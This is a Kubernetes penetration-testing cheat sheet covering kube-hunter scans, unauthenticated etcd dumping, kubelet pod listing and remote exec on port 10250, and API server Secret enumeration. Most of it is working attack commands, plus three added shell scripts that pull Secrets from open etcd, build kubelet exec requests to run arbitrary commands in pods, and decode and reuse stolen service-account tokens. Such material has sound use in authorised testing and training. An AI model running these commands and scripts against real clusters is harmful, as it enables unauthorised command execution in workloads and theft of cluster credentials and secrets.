
Kubernetes Pentest

Ports Info

Kubelet API: Port 10250: The kubelet runs on every node; all pod operations on that node (create, exec, logs) go through it.

etcd: Port 2379: etcd is the key/value store that holds the cluster's configuration and current state, including Secret objects (stored in plaintext unless encryption at rest is configured).

API Server: Port 6443: The API server fronts every operation on the cluster.
- Check whether it can be reached anonymously (see the API Server section below)

Kube-Hunter

#Download kube-hunter from the releases
https://github.com/aquasecurity/kube-hunter/releases

#interactive run, asks which scan to perform
./kube-hunter

#passive scan of a range (no exploitation attempts)
./kube-hunter --cidr 10.10.10.0/24

#active scan of a single host (active mode tries to exploit what it finds, so be noisy on purpose)
./kube-hunter --remote 10.10.10.10 --active

ETCD Anonymous Access

2379/tcp - etcd client API (what etcdctl talks to); 2380/tcp - etcd peer traffic between members

Download etcdctl (it ships in the etcd release tarball)

#list every key; Secret objects sit under /registry/secrets/<namespace>/<name>
etcdctl --endpoints=http://10.10.10.10:2379 get / --prefix --keys-only

#same across a list of hosts (file kube_pods holds one IP per line); use the client port 2379, not the peer port
for ip in $(cat kube_pods); do echo "---------- testing $ip -----------"; etcdctl --endpoints=http://$ip:2379 get / --prefix --keys-only | grep -v "rpc error:"; done
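
The loop above only lists keys. The script below is an added example, not part of the original post: it filters the key listing down to Secret objects, fetches each one and reports whether the stored value carries the k8s:enc: prefix that Kubernetes writes when encryption at rest is on. The host IPs, namespaces and secret names are assumptions, and the key list used in the offline demo is constructed.

```sh
#!/bin/sh
# Added example (not from the original post): enumerate an unauthenticated etcd,
# pull out the keys that hold Kubernetes Secret objects, and tell whether each
# value is encrypted at rest. Target IPs and key names are assumptions.
set -u
export ETCDCTL_API=3   # force the v3 API; older etcdctl builds default to v2

# Secret objects live at /registry/secrets/<namespace>/<name>. Reads the output
# of `etcdctl get / --prefix --keys-only` on stdin and prints "namespace name".
secret_keys() {
  sed -n 's#^/registry/secrets/\([^/]*\)/\([^/]*\)$#\1 \2#p'
}

# Encryption at rest prefixes the stored value with "k8s:enc:<provider>:v1:<key>:";
# a plaintext object is a protobuf that starts with the bytes "k8s" followed by NUL.
value_encryption() {
  first=$(head -c 8 | tr -d '\0')     # NUL is dropped so the shell can hold the bytes
  case "$first" in
    k8s:enc:*) echo encrypted ;;
    k8s*)      echo plaintext ;;
    *)         echo unknown ;;
  esac
}

# For one etcd host: list every Secret and whether it is readable as plaintext.
# Uses the client port 2379; 2380 is the peer port and does not answer client RPCs.
dump_secrets() {
  ep="http://$1:2379"
  etcdctl --endpoints="$ep" get / --prefix --keys-only 2>/dev/null | secret_keys |
  while read -r ns name; do
    enc=$(etcdctl --endpoints="$ep" get "/registry/secrets/$ns/$name" --print-value-only | value_encryption)
    printf '%s %s/%s %s\n' "$1" "$ns" "$name" "$enc"
  done
}

if [ $# -gt 0 ]; then
  for ip in "$@"; do dump_secrets "$ip"; done      # ./etcd_secrets.sh 10.10.10.10 10.10.10.11
else
  # Constructed sample of --keys-only output so the parser can be exercised offline.
  printf '%s\n' /registry/pods/default/web-0 \
                /registry/secrets/default/db-creds \
                /registry/secrets/kube-system/bootstrap-token-abcdef | secret_keys
fi
```

A "plaintext" result means the Secret's data is directly readable from the etcdctl output (protobuf, with the base64 values in the clear); "encrypted" means the KMS/aescbc key is needed and etcd access alone does not give you the secret.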

Look for Open Pods

Kubelet: port 10250 is the authenticated kubelet API (also serves /exec); port 10255 is the legacy read-only port (plain HTTP, no auth, often disabled via readOnlyPort: 0). 10257 and 10259 are the controller-manager and scheduler and do not expose /pods.

#list pods running on the node; a 200 on 10250 without a token means anonymous kubelet access
curl -ks https://10.10.10.10:10250/pods
curl -s http://10.10.10.10:10255/pods

#If you have access to any pods
#try EXEC (each argument of the command is its own command= parameter; a 401/403 here means kubelet auth is on)
curl -skv -X POST -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" "https://10.10.10.10:10250/exec/<namespace>/<pod name>/<container name>/?command=touch&command=hello_world&input=1&output=1&tty=1"
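
The exec URL above is easy to get wrong once the command has spaces or shell metacharacters: every argv element has to be its own command= parameter and each one percent-encoded. The script below is an added example, not from the original post; it probes both kubelet ports and builds the exec URL from a normal argument list. The node, pod and container names are assumptions.

```sh
#!/bin/sh
# Added example (not from the original post): probe the two kubelet ports and
# build the exec URL correctly. Every argv element becomes its own command=
# parameter and is percent-encoded. Node, pod and container names are assumptions.
set -u

# Percent-encode all bytes except the RFC 3986 unreserved set (A-Z a-z 0-9 - . _ ~).
urlenc() {
  printf '%s' "$1" | od -An -v -tx1 | tr -s ' \n' '\n\n' | sed '/^$/d' |
  while read -r hx; do
    case "$hx" in
      3[0-9]|4[1-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]|2d|2e|5f|7e)
        printf "\\$(printf '%03o' "0x$hx")" ;;
      *) printf '%%%s' "$(printf '%s' "$hx" | tr abcdef ABCDEF)" ;;
    esac
  done
}

# exec_url NODE NS POD CONTAINER CMD [ARG...]
# sh -c 'id > /tmp/o' must be sent as command=sh&command=-c&command=id%20%3E%20%2Ftmp%2Fo
exec_url() {
  node="$1"; ns="$2"; pod="$3"; ctr="$4"; shift 4
  q=""
  for a in "$@"; do q="${q}command=$(urlenc "$a")&"; done
  printf 'https://%s:10250/exec/%s/%s/%s?%sinput=1&output=1&tty=1' "$node" "$ns" "$pod" "$ctr" "$q"
}

# 10255 is the legacy read-only port (plain HTTP, no auth); 10250 is the real API.
# A 200 on 10250 /pods without a token means anonymous kubelet access.
kubelet_probe() {
  printf '10255 /pods -> %s\n' "$(curl -s -o /dev/null -w '%{http_code}' "http://$1:10255/pods")"
  printf '10250 /pods -> %s\n' "$(curl -ks -o /dev/null -w '%{http_code}' "https://$1:10250/pods")"
}

kubelet_exec() {   # kubelet_exec NODE NS POD CONTAINER CMD [ARG...]
  curl -sk -X POST \
    -H 'X-Stream-Protocol-Version: v2.channel.k8s.io' \
    -H 'X-Stream-Protocol-Version: channel.k8s.io' \
    "$(exec_url "$@")"
}

if [ $# -ge 5 ]; then
  kubelet_exec "$@"            # ./kubelet_exec.sh 10.10.10.10 default web-0 nginx id
elif [ $# -eq 1 ]; then
  kubelet_probe "$1"           # ./kubelet_exec.sh 10.10.10.10
else
  # Constructed demo: print the URL for a command with spaces and a redirect.
  exec_url 10.10.10.10 default web-0 nginx sh -c 'id > /tmp/o'; echo
fi
```

Run with one argument to probe a node, with five or more to exec; with no arguments it just prints the URL it would request so the encoding can be checked before sending anything.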

API Server - Port 6443

Unauthenticated requests only work if anonymous access is enabled (and RBAC grants system:anonymous the verb); otherwise pass a service-account token with the
Authorization: Bearer <JWT_TOKEN> header via curl -H. A 401 means anonymous auth is off; a 403 means the API server answered but RBAC denied the request.

#List Secrets (anonymous attempt)
curl -kL https://10.10.10.10:6443/api/v1/namespaces/default/secrets

#Show Version info (normally readable without auth)
curl -k https://10.10.10.10:6443/version

#List Secrets in the default namespace - Need creds; .data values are base64-encoded (use /api/v1/secrets for all namespaces)
curl -k -v -H "Authorization: Bearer <jwt_token>" -H "Content-Type: application/json" https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r '.items[].data'

Other Paths to check

/.well-known/oauth-authorization-server   (OpenShift)
/.well-known/openid-configuration
/healthz
/console   (OpenShift web console)
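
Putting the API server checks together: the script below is an added example, not part of the original post. It turns the HTTP status of an anonymous request into the conclusion a tester draws from it, and decodes the payload of a service-account JWT (the token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token inside a pod) so you know which identity you hold before spending it. The target URL is an assumption and the token used in the offline demo is constructed and unsigned.

```sh
#!/bin/sh
# Added example (not from the original post): classify what an anonymous request
# to the API server tells you, and read the identity baked into a service-account
# JWT before using it. The target and the sample token are assumptions.
set -u

# Three outcomes matter for the anonymous probe:
#   200 -> anonymous-auth is on and RBAC grants system:anonymous read access
#   403 -> anonymous-auth is on, RBAC says no (still confirms a live API server)
#   401 -> anonymous-auth is off; bring a bearer token
classify_api_access() {
  case "$1" in
    200) echo "anonymous read allowed" ;;
    401) echo "anonymous auth disabled, bearer token required" ;;
    403) echo "anonymous auth enabled but RBAC denies system:anonymous" ;;
    *)   echo "unexpected status $1" ;;
  esac
}

# Status code only, no body. -k because the API cert is rarely trusted by the attack box.
probe_anon() {   # probe_anon https://10.10.10.10:6443 /api/v1/nodes
  code=$(curl -k -s -o /dev/null -w '%{http_code}' "$1$2")
  printf '%-45s %s  %s\n' "$2" "$code" "$(classify_api_access "$code")"
}

# Decode a JWT payload (base64url, no padding) without verifying the signature.
# For the in-pod token, "sub" is system:serviceaccount:<namespace>:<name>, i.e.
# the identity every request with this token will be authorised as.
jwt_payload() {
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  while [ $(( ${#seg} % 4 )) -ne 0 ]; do seg="$seg="; done
  printf '%s' "$seg" | base64 -d
}

# Authenticated GET once a token is in hand.
api_get() {   # api_get https://10.10.10.10:6443 /api/v1/secrets "$TOKEN"
  curl -k -s -H "Authorization: Bearer $3" "$1$2"
}

# Builds an unsigned token from a payload. Only for the offline demo below; a real
# service-account token is signed by the API server and cannot be forged this way.
make_unsigned_jwt() {
  hdr=$(printf '%s' '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=\n' | tr '/+' '_-')
  pl=$(printf '%s' "$1" | base64 | tr -d '=\n' | tr '/+' '_-')
  printf '%s.%s.' "$hdr" "$pl"
}

if [ $# -gt 0 ]; then
  # ./api_probe.sh https://10.10.10.10:6443
  for p in /version /healthz /api/v1/namespaces/default/secrets /api/v1/nodes; do
    probe_anon "$1" "$p"
  done
else
  # Constructed sample token; shows the decode path without touching a cluster.
  tok=$(make_unsigned_jwt '{"iss":"kubernetes/serviceaccount","sub":"system:serviceaccount:default:default"}')
  jwt_payload "$tok"; echo
fi
```

Once you have a token from a compromised pod, `jwt_payload "$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"` tells you the namespace and service account, and `api_get` with that token is the authenticated version of the secrets request above.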

#install Kubectl
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x kubectl

#use it with a stolen token instead of raw curl
./kubectl --server=https://<master_ip>:6443 --token=<jwt_token> --insecure-skip-tls-verify get pods -A




 



